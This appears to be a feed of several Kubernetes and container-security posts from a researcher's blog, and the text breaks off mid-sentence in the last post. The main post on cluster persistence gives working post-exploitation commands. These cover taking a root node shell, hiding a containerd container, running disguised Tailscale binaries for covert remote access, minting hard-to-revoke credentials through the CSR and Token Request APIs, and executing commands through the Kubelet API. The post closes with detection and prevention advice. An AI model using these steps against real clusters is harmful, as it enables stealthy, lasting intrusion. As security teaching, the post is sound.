Raesene’s Ramblings Things that occur to me https://raesene.github.io/ Beyond the surface - Exploring attacker persistence strategies in Kubernetes <p>I’ve been doing a talk on Kubernetes post-exploitation for a while now and one of the requests has been for a blog post to refer back to, which I’m finally getting around to doing now!</p> <p>The goal of this talk is to lay out one attack path that attackers might use to retain and expand their access after an initial compromise of a Kubernetes cluster by getting access to an admin’s credentials. It doesn’t cover all the ways that attackers could do this, but provides one path and also hopefully illuminates some of the inner workings and default settings that attackers might exploit as part of their attacks.</p> <p>There’s a recording of the talk <a href="https://www.youtube.com/watch?v=GtrkIuq5T3M&amp;t=11s">here</a> if you prefer videos; the flow is similar but I have simplified a bit for the latest iteration, thanks to <a href="https://raesene.github.io/blog/2025/05/30/kubernetes-debug-profiles/">debug profiles</a>! The general story the talk tells is one where attackers have temporary access to a cluster admin’s laptop where the admin has stepped away to take a call and not locked it, and they have to see how to get and keep access to the cluster before the admin comes back.</p> <h3 id="initial-access">Initial access</h3> <p>One of the first things an attacker might want to do with credentials is get a root shell on a Kubernetes cluster node as a good spot to look for credentials or plant binaries. With Kubernetes that’s very simple to do as there is functionality built into the cluster to allow for users with the right levels of access to do that quickly via <code class="language-plaintext highlighter-rouge">kubectl debug</code></p> <p>A typical command might look like this (just replace the node name with one from your cluster)</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl debug node/gke-demo-cluster-default-pool-04a13cdb-5p8d -it --profile=sysadmin --image=busybox </code></pre></div></div> <p>An important point from this command is the <code class="language-plaintext highlighter-rouge">--profile</code> switch as it dictates how much access you’ll have to the node. The <code class="language-plaintext highlighter-rouge">sysadmin</code> profile provides the highest level of access, so is the most useful for attackers.</p> <h3 id="executing-binaries">Executing Binaries</h3> <p>Once the attacker has shell access to a node, their next instinct is likely to download tools to run. This might not be as simple as it could be as many Kubernetes distributions lock down the Node OS, setting filesystems as read-only or <code class="language-plaintext highlighter-rouge">noexec</code>. However, all cluster nodes can do one thing… run containers. So if the attacker can download and run a container on the node, they’re likely to be able to run any programs they like!</p> <p>In doing this we can take a look at some lesser known features of Kubernetes clusters. In a cluster, all containers are run by a container runtime, typically <a href="https://containerd.io/">containerd</a> or <a href="https://cri-o.io/">CRI-O</a>, and it’s possible to talk directly to those programs if you’re on the node, bypassing the Kubernetes APIs altogether.</p> <p>In the talk I start by creating a new containerd namespace using the <code class="language-plaintext highlighter-rouge">ctr</code> tool.
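If you want to check that the runtime is actually reachable from your debug shell first, a rough sketch looks like the commands below (this assumes containerd’s default socket path and that <code class="language-plaintext highlighter-rouge">kubectl debug</code> has mounted the node’s root filesystem at <code class="language-plaintext highlighter-rouge">/host</code>, which can vary by distribution).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># the node's root filesystem is mounted at /host in the debug pod
ls -l /host/run/containerd/containerd.sock
# use the node's own ctr binary against that socket
chroot /host ctr --address /run/containerd/containerd.sock version
</code></pre></div></div> <p>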
Ctr is very useful as it’s always installed (IME) alongside containerd, so you don’t need to get an external client program. We’re creating a containerd namespace to make it a bit harder for someone looking at the host to spot our container. Importantly, containerd namespaces have nothing to do with Kubernetes namespaces, or Linux namespaces.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ctr namespace create sys_net_mon </code></pre></div></div> <p>We create a namespace called <code class="language-plaintext highlighter-rouge">sys_net_mon</code> just to make it a bit less obvious than “attackers were here”! With the namespace created, the next step is to pull down a container image. The one I’m using is <code class="language-plaintext highlighter-rouge">docker.io/sysnetmon/systemd_net_mon:latest</code>. Importantly, the contents of this container image have nothing to do with systemd or network monitoring! From a security standpoint it’s an important thing to remember that outside of the official or verified images, Docker Hub does no curation of image contents, so anyone can call their images anything!</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ctr -n sys_net_mon images pull docker.io/sysnetmon/systemd_net_mon:latest </code></pre></div></div> <p>With the image pulled we can use <code class="language-plaintext highlighter-rouge">ctr</code> to start a container</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ctr -n sys_net_mon run --net-host -d --mount type=bind,src=/,dst=/host,options=rbind:ro docker.io/sysnetmon/systemd_net_mon:latest sys_net_mon </code></pre></div></div> <p>This container provides us with full access to the host’s filesystem and also the host’s network interfaces, which is pretty useful for post-exploitation activity. After that it’s just a question of getting a shell in the container, which can be done with <code class="language-plaintext highlighter-rouge">ctr</code>’s <code class="language-plaintext highlighter-rouge">task exec</code> command (the exact shell binary will depend on what’s in the image).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ctr -n sys_net_mon task exec -t --exec-id shell sys_net_mon sh </code></pre></div></div> <h3 id="static-manifests">Static Manifests</h3> <p>Another approach which the attackers could use to run a container on the node is static manifests. Most Kubelets will define a directory on the host which they will load static manifests from. These manifests run a pod without the API server needing to be involved. A handy trick for our attackers is to give their static pod an invalid namespace name, as this prevents it being registered with the API server, so it won’t show up in <code class="language-plaintext highlighter-rouge">kubectl get pods -A</code> or similar. There are more details on static pods and some of their security oddness on <a href="https://blog.iainsmart.co.uk/posts/2024-10-13-mirror-mirror/">Iain Smart’s blog</a>.</p> <h3 id="remote-access">Remote Access</h3> <p>The next problem our attackers have to tackle is retaining remote access to the environment after the admin returns to their laptop.
Whilst there are a number of remote access programs available, a lot of the security/hacker related ones will be spotted by EDR/XDR style agents, so an alternative can be using something like <a href="https://tailscale.com/">Tailscale</a>!</p> <p>Tailscale has a number of features which are very useful for attackers (in addition to their normal usefulness!). The first is that it can be run with two statically compiled golang binaries that can be renamed. This means that you can pick what will show up in the process list of the node. Following the theme of the container image, we use the binary names <code class="language-plaintext highlighter-rouge">systemd_net_mon_server</code> and <code class="language-plaintext highlighter-rouge">systemd_net_mon_client</code></p> <p>The first command starts the server</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>systemd_net_mon_server --tun=userspace-networking --socks5-server=localhost:1055 &amp; </code></pre></div></div> <p>and then we start the client</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>systemd_net_mon_client up --ssh --hostname cafebot --auth-key=tskey-auth-XXXXX </code></pre></div></div> <p>In terms of network access this only needs 443/TCP outbound if it uses Tailscale’s DERP network, so that access will probably be allowed in most environments. Also we can use Tailscale’s ACL feature so that our compromised container can’t communicate with any other machines on our Tailnet.</p> <p><img src="https://raesene.github.io/assets/media/Tailscale-bot-access-control.png" alt="Tailscale ACLs" /></p> <p>With those services running it should be possible to come back into the container over SSH. Tailscale bundles an SSH server with the program, so no separate sshd process will show as running :)</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tailscale ssh root@cafebot </code></pre></div></div> <h3 id="credentials---kubelet-api">Credentials - Kubelet API</h3> <p>With remote access achieved, our attackers still need long lasting credentials and also it would be nice if they could probe the cluster without touching the Kubernetes API server, as that might show up in audit logs. So to do this they need access to credentials for a user who can talk to the Kubelet API directly. This runs on every node on 10250/TCP and has no auditing option available.</p> <p>To do this in the talk I use <a href="https://github.com/raesene/teisteanas/">teisteanas</a>, which creates Kubeconfig based credentials for users using the Certificate Signing Request (CSR) API. We can create a set of credentials for any user using this approach. For stealth an attacker would likely choose a user which already has rights assigned to it in RBAC, so they don’t have to create any new cluster roles or cluster role bindings. The exact user to use will vary, but in the demos from the talk I use <code class="language-plaintext highlighter-rouge">kube-apiserver</code> which is a user that exists in GKE clusters.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>teisteanas -username kube-apiserver -output-file kubelet-user.config </code></pre></div></div> <p>With that Kubeconfig file in hand and access to the Kubelet port on a host, it’s possible to take actions like listing pods on a node or executing commands in those pods.
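At the HTTP level this is just TLS client certificate authentication against the Kubelet’s port, so a rough sketch of doing it by hand with curl might look like this (the jsonpath expressions and file names are just illustrative, and the pod and container names would need filling in).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># pull the client certificate and key out of the generated kubeconfig
kubectl --kubeconfig kubelet-user.config config view --raw -o jsonpath='{.users[0].user.client-certificate-data}' | base64 -d &gt; user.crt
kubectl --kubeconfig kubelet-user.config config view --raw -o jsonpath='{.users[0].user.client-key-data}' | base64 -d &gt; user.key
# list the pods the Kubelet knows about (-k as the Kubelet's serving certificate generally isn't trusted by the client)
curl -sk --cert user.crt --key user.key https://127.0.0.1:10250/pods
# run a command in one of those pods
curl -sk --cert user.crt --key user.key -X POST "https://127.0.0.1:10250/run/&lt;namespace&gt;/&lt;pod&gt;/&lt;container&gt;" -d "cmd=id"
</code></pre></div></div> <p>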
The easiest way to do this is to use <a href="https://github.com/cyberark/kubeletctl">kubeletctl</a>. So from our container which is running on the node, using the node’s network namespace, we can run something like this</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubeletctl -s 127.0.0.1 -k kubelet-user.config pods </code></pre></div></div> <h3 id="csr-api">CSR API</h3> <p>It’s also important to understand a bit about the CSR API as, for attackers, it’s a useful thing to take advantage of. This API exists in pretty much every Kubernetes distribution and can be used to create credentials that authenticate to the cluster, apart from when using EKS as it does not allow that function. Very importantly credentials created via the CSR API can be abused by anyone who has access to the API server. Most managed Kubernetes distributions have chosen to have the Kubernetes API server exposed to the Internet by default, so an attacker who is able to get credentials for a cluster will be able to use them from anywhere in the world!</p> <p>The CSR API is also attractive to attackers for a number of reasons :-</p> <ul> <li>Unless audit logging is enabled and correctly configured there is no record of the API having been used and the credentials having been created.</li> <li>Credentials created by this API cannot be revoked without rotating the certificate authority for the whole cluster, which is a disruptive operation. The <a href="https://github.com/kubernetes/kubernetes/issues/18982">GitHub issue related to certificate revocation</a> has been open since 2015, so it’s likely this will not change now…</li> <li>It’s possible to create credentials for generic system accounts, so even if the cluster operator has audit logging enabled, it could be difficult to identify malicious activity.</li> <li>The credentials tend to be long lived. Whilst this is distribution dependent, generally this is 1-5 years.</li> </ul> <p>In the demos for the talk we’re running against a GKE cluster, so used the CSR API to generate credentials for the <code class="language-plaintext highlighter-rouge">system:gke-common-webhooks</code> user which has quite wide ranging privileges.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>teisteanas -username system:gke-common-webhooks -output-file webhook.config </code></pre></div></div> <h3 id="token-request-api">Token Request API</h3> <p>Even if the CSR API isn’t available there’s another option built into Kubernetes that can create new credentials, which is the Token Request API. This is used by Kubernetes clusters to create service account tokens, but there’s nothing to stop an administrator who has the correct rights from using it. 
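In fact this is built right into kubectl, so a minimal sketch of what that looks like is below (the service account name is just an example, and the duration you actually get back is capped by the cluster’s configuration).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># ask the Token Request API for a token for an existing service account
kubectl create token clusterrole-aggregation-controller -n kube-system --duration=8760h
</code></pre></div></div> <p>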
Similarly to the CSR API there’s no persistent record (apart from audit logs) that new credentials have been created, and they can be hard to revoke if a system level service account has been used, as the only way to revoke the credential is to delete its associated service account.</p> <p>The expiry may be less of a problem than you’d expect: depending on the Kubernetes distribution in use, it can vary from a maximum of 24 hours up to one year across the managed distributions I’ve looked at.</p> <p>In the talk I use <a href="https://github.com/raesene/tocan/">tocan</a> to simplify the process of creating a Kubeconfig file from a service account token.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tocan -namespace kube-system -service-account clusterrole-aggregation-controller </code></pre></div></div> <p>The service account we clone is an interesting one as it has the “escalate” right, which means it can always become cluster-admin even if it doesn’t have those rights to begin with. (I’ve written about <a href="https://raesene.github.io/blog/2020/12/12/Escalating_Away/">escalate</a> before)</p> <h3 id="detecting-these-attacks">Detecting these attacks</h3> <p>The talk closes by discussing how to detect and prevent these kinds of attacks. For detection there are a couple of key things to look at</p> <ul> <li><strong>Kubernetes audit logs</strong> - This one is very important. You need to have audit logging enabled with centralized logs and good retention to spot some of the techniques used here, especially abuse of the CSR and Token Request APIs</li> <li><strong>Node Agents</strong> - Having security agents running on cluster nodes could allow for detection of things like the Tailscale traffic, depending on their configuration</li> <li><strong>Node Logs</strong> - Generally ensuring that logs on nodes are properly centralized and stored is going to be important, as attackers can leave traces there.</li> <li><strong>Know what good looks like</strong> - This one sounds simple but possibly isn’t. If you know what processes should be running on your cluster nodes, you can spot things like “systemd_net_mon” when they show up. What’s tricky here is that every distribution has a different set of management services run by the cloud provider, so it’s not a one off effort knowing what should be there.</li> </ul> <h3 id="preventing-these-attacks">Preventing these attacks</h3> <p>There are a couple of key ways cluster admins can reduce the risk of this scenario happening to them:</p> <ul> <li><strong>Take your clusters off the Internet!!</strong> - Exposing the API server this way means you are one set of lost credentials away from a very bad day. Generally managed Kubernetes distributions will allow you to restrict access, but it’s not the default.</li> <li><strong>Least Privilege</strong> - In this scenario, the compromised laptop had cluster-admin level privileges, enabling the attackers to move through the cluster easily. If the admin had been using an account with fewer privileges, the attacks might well not have succeeded.
Whilst some of the rights used here, like node debugging, are probably needed fairly regularly, others like the CSR API and Token Request API probably shouldn’t be needed in day-to-day administration, so could be restricted.</li> </ul> <p>To quote <a href="https://bsky.app/profile/lookitup.baby">Ian Coldwater</a></p> <p><img src="https://raesene.github.io/assets/media/made-of-stars.png" alt="Made of stars" /></p> <h3 id="conclusion">Conclusion</h3> <p>This talk just looks at one path that attackers could take to retain and expand their access to a cluster they’ve compromised. There are obviously other possibilities, but this can shed some light on some of the ways that Kubernetes works and how to improve your cluster security!</p> Fri, 12 Sep 2025 10:00:00 +0100 https://raesene.github.io/blog/2025/09/12/beyond-the-surface/ https://raesene.github.io/blog/2025/09/12/beyond-the-surface/ Bitnami Deprecation <p><strong>Update</strong> Looks like Bitnami have decided to take some more time over this (<a href="https://community.broadcom.com/tanzu/blogs/beltran-rueda-borrego/2025/08/18/how-to-prepare-for-the-bitnami-changes-coming-soon">details here</a>) and will have some 1-day brownouts before removing the repos on Sept 29.</p> <p>One constant of modern development environments is the ever increasing number of dependencies, and the problems that come when they get disrupted. Next week there could be a serious disruption in the container image ecosystem as a provider of popular images and Helm charts changes their availability and tags.</p> <h2 id="whats-happening">What’s Happening?</h2> <p><a href="https://github.com/bitnami/charts/issues/35164">This Github issue</a> has most of the details, but it’s a little hard to work out the exact impact from it. The TL;DR is that Bitnami are moving from freely available images under the Docker Hub username <code class="language-plaintext highlighter-rouge">bitnami</code> to a split of commercially maintained images under <code class="language-plaintext highlighter-rouge">bitnamisecure</code> and unmaintained legacy images under <code class="language-plaintext highlighter-rouge">bitnamilegacy</code>.</p> <p>The exact timing is unclear as the issue mentions <code class="language-plaintext highlighter-rouge">gradually move existing ones</code> to the legacy repository, however the impact is going to start in a week’s time, on August 28th 2025, so it’s clear that organizations using these images will need to take action sooner rather than later.</p> <h2 id="so-whats-the-impact">So what’s the impact?</h2> <p>Well if you’re either directly using images from <code class="language-plaintext highlighter-rouge">bitnami</code>, Helm charts that reference those images, or images that are built off those base images, you need to start using different images pretty quickly or you might find deploys or image builds failing.</p> <h2 id="how-big-of-a-problem-is-this">How big of a problem is this?</h2> <p>After reading this, I thought it could be worth looking at how many pulls these images are getting.
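Docker Hub’s public API includes a <code class="language-plaintext highlighter-rouge">pull_count</code> field for each repository, so a quick way to sample it looks something like this (one repository used as an example, with jq just for readability).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># grab the current cumulative pull count for one of the bitnami repositories
curl -s https://hub.docker.com/v2/repositories/bitnami/kubectl/ | jq .pull_count
</code></pre></div></div> <p>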
By looking at how those pull counts change over time we can get a reasonable idea of how many people are going to be affected.</p> <p>Looking at pull statistics for popular bitnami images over the course of 6 days we can see that the most popular image <code class="language-plaintext highlighter-rouge">kubectl</code> got 1.86M pulls in that time period, and a large number of images have had over 100K pulls in that time, so it seems like these images are pretty heavily used.</p> <p><img src="https://raesene.github.io/assets/media/bitnami-stats.png" alt="bitnami stats" /></p> <h2 id="conclusion">Conclusion</h2> <p>I’ve long said that, when using container images in production, it’s vitally important that you build and maintain all of your own images, or, if you prefer, have some kind of commercial maintenance agreement for them. Relying on freely provided externally managed images is a recipe for problems down the line.</p> <p>For now though, the critical point is that everyone using Bitnami images needs to go and review all their usage and make a fairly rapid plan to address the risk of them breaking in the near future.</p> Thu, 21 Aug 2025 12:30:00 +0100 https://raesene.github.io/blog/2025/08/21/bitnami-deprecation/ https://raesene.github.io/blog/2025/08/21/bitnami-deprecation/ Am I Still Contained? <p>This exploration started, as many do, with “huh that’s odd”. Specifically I was looking at the output of <a href="https://github.com/genuinetools/amicontained">amicontained</a> around filtered syscalls.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Seccomp: filtering Blocked Syscalls <span class="o">(</span>54<span class="o">)</span>: MSGRCV SYSLOG SETSID USELIB USTAT SYSFS VHANGUP PIVOT_ROOT _SYSCTL ACCT SETTIMEOFDAY MOUNT UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME IOPL IOPERM CREATE_MODULE INIT_MODULE DELETE_MODULE GET_KERNEL_SYMS QUERY_MODULE QUOTACTL NFSSERVCTL GETPMSG PUTPMSG AFS_SYSCALL TUXCALL SECURITY LOOKUP_DCOOKIE CLOCK_SETTIME VSERVER MBIND SET_MEMPOLICY GET_MEMPOLICY KEXEC_LOAD ADD_KEY REQUEST_KEY KEYCTL MIGRATE_PAGES UNSHARE MOVE_PAGES PERF_EVENT_OPEN FANOTIFY_INIT OPEN_BY_HANDLE_AT SETNS KCMP FINIT_MODULE KEXEC_FILE_LOAD BPF USERFAULTFD </code></pre></div></div> <p>Looking at the syscalls that were listed as blocked, I noticed that there wasn’t any mention of IO_URING, but I know that Docker <a href="https://github.com/moby/moby/pull/46762">blocks io_uring syscalls in the default profile</a>, so what’s going on?</p> <h2 id="looking-at-the-source-code">Looking at the source code</h2> <p>I decided to take a look at the source code to see what was going on and why it might not be working. In the <a href="https://github.com/genuinetools/amicontained/blob/568b0d35e60cb2bfc228ecade8b0ba62c49a906a/main.go#L187">seccompIter function</a> I found what looks like a relevant point.
A for loop that iterates over each syscall one at a time.</p> <div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="n">id</span> <span class="o">:=</span> <span class="m">0</span><span class="p">;</span> <span class="n">id</span> <span class="o">&lt;=</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_RSEQ</span><span class="p">;</span> <span class="n">id</span><span class="o">++</span> </code></pre></div></div> <p>The end point for the loop was a syscall called <code class="language-plaintext highlighter-rouge">SYS_RSEQ</code> and thanks to a very helpful lookup table <a href="https://filippo.io/linux-syscall-table/">here</a> I could see that that’s syscall <code class="language-plaintext highlighter-rouge">334</code>, and the IO_URING syscalls are 425-427, so we can see why they’re not being flagged, the loop doesn’t go that high!</p> <h2 id="fixing-the-problem">Fixing the problem</h2> <p>Whilst I’m not a professional developer by any stretch of the imagination (&lt;GEEK REFERENCE&gt; I’d liken myself to a rogue with the use magic device skill trying to get a wand of fireballs working by hitting the end of it &lt;/GEEK REFERENCE&gt;), I decided to take a stab at fixing the code to get it to include the IO_URING syscalls (and any other ones with higher numbers).</p> <p>We could just increase the maximum number on the for loop, but that does run into a problem, which is that there’s a weird gap in the syscall numbers between 334 and 424. It appears that this was done to <a href="https://stackoverflow.com/a/63713244/537897">sync up syscall numbers in different processor architectures</a>, so we can just add a section to the code to skip those blank numbers.</p> <p>The next tricky part is, it turns out making syscalls directly can sometimes cause the process to exit or hang. The original code has a number of <a href="https://github.com/genuinetools/amicontained/blob/568b0d35e60cb2bfc228ecade8b0ba62c49a906a/main.go#L190">blocks designed to skip tricky syscalls</a></p> <div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c">// these cause a hang, so just skip</span> <span class="c">// rt_sigreturn, select, pause, pselect6, ppoll</span> <span class="k">if</span> <span class="n">id</span> <span class="o">==</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_RT_SIGRETURN</span> <span class="o">||</span> <span class="n">id</span> <span class="o">==</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_SELECT</span> <span class="o">||</span> <span class="n">id</span> <span class="o">==</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_PAUSE</span> <span class="o">||</span> <span class="n">id</span> <span class="o">==</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_PSELECT6</span> <span class="o">||</span> <span class="n">id</span> <span class="o">==</span> <span class="n">unix</span><span class="o">.</span><span class="n">SYS_PPOLL</span> <span class="p">{</span> <span class="k">continue</span> <span class="p">}</span> </code></pre></div></div> <p>Here the approach ended up being a bit trial and error on what syscalls caused problems. 
Also an interesting aside is that this shows a limitation of this approach to enumerating syscalls, it’s not possible to get a definitive list as you can’t probe for every possible syscall!</p> <p>With that largely working, it was just a question of extending the really long <a href="https://github.com/genuinetools/amicontained/blob/568b0d35e60cb2bfc228ecade8b0ba62c49a906a/main.go#L243">syscallName</a> function that has a case statement giving names for every syscall. This was also the only part of this that LLMs could help with (they got the main problem wildly wrong), and even here they only got most of it right.</p> <p>After all that it looks like this largely works. As the original repository seems unmaintained, I’ve put a fork <a href="https://github.com/raesene/amicontained">here</a> with the updated code.</p> <h2 id="results">Results</h2> <p>Using the updated code in a Docker container we can see that the number of blocked syscalls has increased from 54 to 68, including the IO_URING ones that started this!</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Blocked Syscalls <span class="o">(</span>68<span class="o">)</span>: SYSLOG SETSID USELIB USTAT SYSFS VHANGUP PIVOT_ROOT _SYSCTL ACCT SETTIMEOFDAY MOUNT UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME IOPL IOPERM CREATE_MODULE INIT_MODULE DELETE_MODULE GET_KERNEL_SYMS QUERY_MODULE QUOTACTL NFSSERVCTL GETPMSG PUTPMSG AFS_SYSCALL TUXCALL SECURITY LOOKUP_DCOOKIE CLOCK_SETTIME VSERVER MBIND SET_MEMPOLICY GET_MEMPOLICY KEXEC_LOAD ADD_KEY REQUEST_KEY KEYCTL MIGRATE_PAGES UNSHARE MOVE_PAGES PERF_EVENT_OPEN FANOTIFY_INIT OPEN_BY_HANDLE_AT SETNS KCMP FINIT_MODULE KEXEC_FILE_LOAD BPF USERFAULTFD IO_URING_SETUP IO_URING_ENTER IO_URING_REGISTER OPEN_TREE MOVE_MOUNT FSOPEN FSCONFIG FSMOUNT FSPICK PIDFD_GETFD PROCESS_MADVISE MOUNT_SETATTR QUOTACTL_FD LANDLOCK_RESTRICT_SELF SET_MEMPOLICY_HOME_NODE </code></pre></div></div> <h2 id="conclusion">Conclusion</h2> <p>This one was interesting for a number of reasons. First up was a good reminder that you can’t rely on tools always working the way they used to, as the underlying systems change. The second one was that I learned quite a bit about the limitations of closed box testing of syscalls, and also as a side lesson, the current limitations of LLMs when dealing with relatively obscure lower level tech.</p> Mon, 09 Jun 2025 10:30:00 +0100 https://raesene.github.io/blog/2025/06/09/am-i-still-contained/ https://raesene.github.io/blog/2025/06/09/am-i-still-contained/ Kubernetes Debug Profiles <p>I got a lesson today in the idea that it’s always worth re-visiting things you’ve used in the past to see how they’ve changed, as sometimes there will be cool new features!</p> <p>In my <a href="https://youtu.be/4L8Dg_QSx30?si=hwH6LcwvXGCOVkhg">Kubernetes Post-Exploitation talk</a> I make use of <code class="language-plaintext highlighter-rouge">kubectl debug</code> as a means to get a root shell on a cluster node. 
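The basic shape of that command is something like the one below (the node name is just from a test cluster, and with no profile specified you get the default “legacy” behaviour discussed in a moment).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># start a debug pod on the target node and attach to it
kubectl debug node/kind-control-plane -it --image=busybox
</code></pre></div></div> <p>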
It’s a very handy command but <em>I thought</em> it wasn’t possible to use <code class="language-plaintext highlighter-rouge">ctr</code> commands from inside the shell you get with <code class="language-plaintext highlighter-rouge">kubectl debug</code>, and that turns out to be outdated information!</p> <h2 id="whats-the-problem">What’s the problem?</h2> <p>If you’ve done much with container pentesting or offensive security, you’ll have come across the idea that access to the Docker socket effectively gives root access to the underlying host via <a href="https://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/">The most pointless Docker command ever</a>, and this is true even if you just have a container with that file mounted in.</p> <p>However in modern Kubernetes clusters, it’s likely that the underlying container runtime is <a href="https://containerd.io/">containerd</a> and not Docker. What can be surprising is that the containerd socket works very differently from the Docker one. It assumes that the client program and the containerd server are operating on the same host with the same environment.</p> <h2 id="old-kubectl-debug">(old) kubectl debug</h2> <p>This problem shows up when using the “legacy” profile for kubectl debug node (which is the default if you don’t specify one). Some commands using the <code class="language-plaintext highlighter-rouge">ctr</code> client, like pulling new images, will work just fine; however, when you try to run a new container you’ll get an error like this</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ctr: failed to unmount /tmp/containerd-mount2094132404: operation not permitted: failed to mount /tmp/containerd-mount2094132404: operation not permitted </code></pre></div></div> <h2 id="kubectl-debug-profiles-to-the-rescue">Kubectl debug profiles to the rescue!</h2> <p>Fortunately Kubernetes SIG-CLI have been improving on the initial kubectl debug command by having a set of profiles that you can specify, which provide different sets of rights on the node you’re debugging. The list of available profiles is “legacy”, “general”, “baseline”, “netadmin”, “restricted” or “sysadmin”, with the default being “legacy”.</p> <p>So I decided to try the commands from my demo, but with the <code class="language-plaintext highlighter-rouge">sysadmin</code> profile specified as an option, and it works!</p> <p>This is very handy if you’re a sysadmin who wants to interact with the containerd socket as part of your troubleshooting, or if you’re an attacker who’s got access to a host and wants to hide some tools in a containerd container!</p> <p>There are some details on what each of the profiles sets in terms of security options in this <a href="https://github.com/kubernetes/enhancements/tree/master/keps/sig-cli/1441-kubectl-debug#debugging-profiles">KEP</a>.</p> <h2 id="conclusion">Conclusion</h2> <p>As ever there’s loads of cool new Kubernetes features that come up all the time.
I’ve been doing container security things for 9+ years now and I’m still finding interesting things to look at!</p> Fri, 30 May 2025 17:00:00 +0100 https://raesene.github.io/blog/2025/05/30/kubernetes-debug-profiles/ https://raesene.github.io/blog/2025/05/30/kubernetes-debug-profiles/ Cap or no cap <p>I was looking at a <a href="https://github.com/kubernetes/kubernetes/issues/131336">Kubernetes issue</a> the other day and it led me down a kind of interesting rabbit hole, so I thought it’d be worth sharing as I learned a couple of things.</p> <h2 id="background">Background</h2> <p>The issue is to do with the interaction of <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation</code> and added capabilities in a Kubernetes workload specification. In the issue the reporter noted that if you add <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> to a manifest while setting <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> it blocks the deploy but other capabilities when added do not block.</p> <p><code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation</code> is kind of an interesting flag as it doesn’t really do what the name says. In reality, what it does is set a specific Linux Kernel setting designed to stop a process from getting more privileges than when it started, however the name implies it’s intended to do a more wide ranging set of blocks. My colleague Christophe has a <a href="https://blog.christophetd.fr/stop-worrying-about-allowprivilegeescalation/">detailed post looking at this misunderstanding</a>.</p> <p>However what was specifically interesting to me was, when I tried out a quick manifest to re-create the problem, I wasn’t able to and the pod I created was admitted ok.</p> <p>After a bit of looking I realised that when adding the capability, I’d used the name <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> instead of <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code>, and it had worked fine, weird!</p> <h2 id="exploring-whats-going-on">Exploring what’s going on</h2> <p>I decided to put together a couple of quick test cases to understand what’s happening (manifests are <a href="https://github.com/raesene/k8sapecsa">here</a>).</p> <ul> <li><code class="language-plaintext highlighter-rouge">capsysadminpod.yaml</code> - This pod adds <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> to the capabilities list</li> <li><code class="language-plaintext highlighter-rouge">sysadminpod.yaml</code> - This pod adds <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> to the capabilities list</li> <li><code class="language-plaintext highlighter-rouge">dontallowprivesccapsysadminpod.yaml</code> - This has <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> set and adds <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> to the capabilities list</li> <li><code class="language-plaintext highlighter-rouge">dontallowprivescsysadminpod.yaml</code> - This has <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> set and adds <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> to the capabilities list</li> <li><code class="language-plaintext highlighter-rouge">invalidcap.yaml</code> - This pod has an invalid capability (<code class="language-plaintext highlighter-rouge">LOREM</code>) set.</li> </ul> <p>Trying these 
manifests out in a <a href="https://kind.sigs.k8s.io/">kind</a> cluster (using containerd as CRI) showed a couple of things</p> <ul> <li>Adding <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> worked but there was no capability added.</li> <li>Adding <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> worked and the capability was added.</li> <li>Setting <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> and adding <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> was blocked.</li> <li>Setting <code class="language-plaintext highlighter-rouge">allowPrivilegeEscalation: false</code> and adding <code class="language-plaintext highlighter-rouge">SYS_ADMIN</code> was allowed and the capability was added.</li> <li>Setting an invalid capability worked ok but no capability was added.</li> </ul> <p>So a couple of lessons from that. Kubernetes does not check what capabilities you add, and no error is generated if you add an invalid one; it just doesn’t do anything. Also there’s a redundant block in Kubernetes at the moment, where something that doesn’t do anything is blocked, but something which does do something is allowed…</p> <p>Doing some more searching on Github turned up some more history on this. Back in 2021, there was a <a href="https://github.com/kubernetes/kubernetes/pull/105237">PR to try and fix this</a> which didn’t get merged, 